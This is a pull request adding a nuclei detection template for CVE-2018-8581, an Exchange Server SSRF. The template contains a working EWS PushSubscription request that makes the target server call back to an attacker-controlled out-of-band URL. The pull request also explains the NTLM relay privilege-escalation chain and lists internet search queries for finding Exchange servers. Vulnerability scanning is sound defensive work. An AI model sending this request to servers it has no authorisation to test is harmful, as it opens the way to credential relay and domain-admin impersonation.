### PR TITLE
Add CVE-2018-8581 Microsoft Exchange Server SSRF/Privilege Escalation template

### DIFF
--- a/http/cves/2018/CVE-2018-8581.yaml
+++ b/http/cves/2018/CVE-2018-8581.yaml
@@ -1,0 +1,108 @@
+id: CVE-2018-8581
+
+info:
+  name: Microsoft Exchange Server - SSRF/Privilege Escalation via PushSubscription
+  author: ohmygod20260203
+  severity: high
+  description: |
+    Microsoft Exchange Server contains a Server-Side Request Forgery (SSRF) vulnerability in the EWS PushSubscription feature. An authenticated attacker can exploit this to make Exchange Server send HTTP requests with NTLM credentials to arbitrary URLs. When combined with NTLM relay attacks, this leads to privilege escalation, allowing impersonation of any user including domain administrators.
+
+    The vulnerability exists because Exchange uses CredentialCache.DefaultCredentials (running as NT AUTHORITY\SYSTEM) for outbound HTTP connections and has DisableLoopbackCheck enabled by default.
+
+    This template requires valid Exchange credentials. Use: nuclei -t CVE-2018-8581.yaml -var username=user -var password=pass
+  impact: |
+    Successful exploitation allows an authenticated attacker to:
+    - Escalate privileges to any user on Exchange server
+    - Impersonate domain administrators
+    - Access and exfiltrate email communications
+    - Perform lateral movement within the domain
+  remediation: |
+    Remove the DisableLoopbackCheck registry key:
+    reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableLoopbackCheck /f
+
+    Apply Microsoft security updates for Exchange Server.
+  reference:
+    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581
+    - https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange
+    - https://github.com/thezdi/PoC/tree/master/CVE-2018-8581
+    - https://github.com/Ridter/Exchange2domain
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-8581
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 8.1
+    cve-id: CVE-2018-8581
+    cwe-id: CWE-918
+    epss-score: 0.97317
+    epss-percentile: 0.99862
+    cpe: cpe:2.3:a:microsoft:exchange_server:2010:sp3:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: microsoft
+    product: exchange_server
+    shodan-query:
+      - http.favicon.hash:1768726119
+      - http.title:"outlook"
+      - cpe:"cpe:2.3:a:microsoft:exchange_server"
+    fofa-query:
+      - title="outlook"
+      - icon_hash=1768726119
+    google-query: intitle:"outlook"
+  tags: cve,cve2018,ssrf,exchange,microsoft,kev,oast,authenticated,privesc,ews
+
+variables:
+  username: "{{username}}"
+  password: "{{password}}"
+
+http:
+  - raw:
+      - |
+        POST /EWS/Exchange.asmx HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic {{base64(username + ':' + password)}}
+        Content-Type: text/xml; charset=utf-8
+        User-Agent: ExchangeServicesClient/0.0.0.0
+
+        <?xml version="1.0" encoding="UTF-8"?>
+        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
+                       xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
+                       xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
+           <soap:Header>
+              <t:RequestServerVersion Version="Exchange2013" />
+           </soap:Header>
+           <soap:Body>
+              <m:Subscribe>
+                 <m:PushSubscriptionRequest SubscribeToAllFolders="true">
+                    <t:EventTypes>
+                       <t:EventType>NewMailEvent</t:EventType>
+                    </t:EventTypes>
+                    <t:StatusFrequency>1</t:StatusFrequency>
+                    <t:URL>{{interactsh-url}}</t:URL>
+                 </m:PushSubscriptionRequest>
+              </m:Subscribe>
+           </soap:Body>
+        </soap:Envelope>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "SubscribeResponseMessage") || contains(body, "SubscriptionId")'
+        condition: and
+
+    extractors:
+      - type: regex
+        name: subscription_id
+        group: 1
+        regex:
+          - '<t:SubscriptionId>([^<]+)</t:SubscriptionId>'
+
+      - type: kval
+        kval:
+          - x_owa_version


### PR DESCRIPTION
## Summary
This PR adds a nuclei template for CVE-2018-8581, a Server-Side Request Forgery (SSRF) vulnerability in Microsoft Exchange Server's EWS PushSubscription feature.

## Vulnerability Details
- **CVE**: CVE-2018-8581
- **Severity**: High (CVSS 8.1)
- **Type**: SSRF/Privilege Escalation
- **Affected**: Microsoft Exchange Server 2010/2013/2016
- **KEV**: Yes (Known Exploited Vulnerability)

## Technical Details
The vulnerability exists in Exchange Web Services (EWS) PushSubscription functionality:
1. An authenticated user can create a PushSubscription with any URL
2. Exchange Server uses `CredentialCache.DefaultCredentials` (running as NT AUTHORITY\SYSTEM) for outbound connections
3. `DisableLoopbackCheck` is enabled by default in Exchange
4. This allows NTLM credential relay attacks to impersonate any user

## Template Features
- Uses OOB interaction (interactsh) to verify Exchange makes callback with credentials
- Requires valid Exchange credentials (this is an authenticated vulnerability)
- Demonstrates actual SSRF behavior, not just version detection
- Extracts subscription ID and Exchange version

## Usage
```bash
nuclei -t CVE-2018-8581.yaml -u https://exchange.target.com -var username=user -var password=pass
```

## References
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581
- https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange
- https://github.com/thezdi/PoC/tree/master/CVE-2018-8581

Closes #14576